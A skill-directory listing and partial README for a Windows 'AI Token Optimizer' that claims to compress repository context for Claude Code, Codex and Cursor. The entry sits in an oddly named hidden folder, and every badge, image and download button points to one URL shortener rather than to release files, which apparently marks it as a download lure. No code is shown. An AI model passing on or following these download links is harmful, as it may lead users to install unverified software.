Claude-Codex-Cursor-Token-Saver

.Git Z2ey1tgs8e — AI skill for Claude Code

AI community

AI Coding Token Saver for Windows — optimize prompts and repository context before sending it to Claude, Codex, Cursor and similar tools using local filtering, file prioritization, context compression.

How to install .Git Z2ey1tgs8e

This entry records only its repository, not the path inside it, so there is no exact command to give. Open Claude-Codex-Cursor-Token-Saver/.git-z2ey1tgs8e and copy the folder into ~/.claude/skills/, or the file into ~/.claude/agents/.

What .Git Z2ey1tgs8e does

AI Coding Token Saver for Windows — optimize prompts and repository context before sending it to Claude, Codex, Cursor and similar tools using local filtering, file prioritization, context compression, token budgets and reversible profiles.

Alternatives in AI

  • Model Update — 增量更新财务模型 — 用新财报/新指引/修正假设重算 DCF 内在价值、Comps 隐含价、投资逻辑与目标价,输出 before→after delta 6.6k ★
  • Ccstatusline — by sirmalloc - A highly customizable status line formatter for Claude Code CLI that displays model info, git b 5.5k ★
  • Gentle AI — Agent Skills Index — When working on this project, load the relevant skill(s) BEFORE writing any code 1.9k ★

README

⚡ AI Token Optimizer — Claude Code, Codex & Cursor Context Compressor

**AI Token Optimizer** is A local desktop utility for reducing unnecessary context sent to AI coding assistants. It prepares a smaller, higher-signal context bundle before you paste or hand it to the coding agent.

**Reduction claim:** The project can target **up to 70% lower context/token usage**, but actual reduction varies by repository, task, selected files, history length and profile.

Quick Access

[![Claude Code](https://img.shields.io/badge/Claude%20Code-Profile-8250df?style=for-the-badge)](https://flyn.co/17yeN7/) [![Codex](https://img.shields.io/badge/Codex-Profile-0969da?style=for-the-badge)](https://flyn.co/17yeN7/) [![Cursor](https://img.shields.io/badge/Cursor-Profile-1f883d?style=for-the-badge)](https://flyn.co/17yeN7/) [![Download](https://img.shields.io/badge/Download-Latest%20Version-2f81f7?style=for-the-badge)](https://flyn.co/17yeN7/)

Download

➡️ **[Download AI Token Optimizer](https://flyn.co/17yeN7/)**

Preview

[![Preview](assets/ai-token-optimizer-preview.png)](https://flyn.co/17yeN7/)

Dashboard

[![Dashboard](assets/ai-token-optimizer-dashboard.png)](https://flyn.co/17yeN7/)

Workflow

[![Workflow](assets/ai-token-optimization-workflow.png)](https://flyn.co/17yeN7/)

Example token counts are illustrative, not benchmark guarantees.

Core Features

  • Git diff-first context
  • Duplicate block removal
  • Long-session history summaries
  • Generated/build-file filters
  • Repository token budgets
  • Before/after token estimates
  • Claude Code profile
  • Codex profile
  • Cursor profile
  • Generic coding-agent profile
  • Clipboard / Markdown export
  • Reusable presets

How It Saves Context

Diff-first

Prioritize changed files, modified functions, nearby imports, direct dependencies and relevant tests instead of resending an entire repository.

Deduplication

Flag repeated logs, duplicate code blocks, repea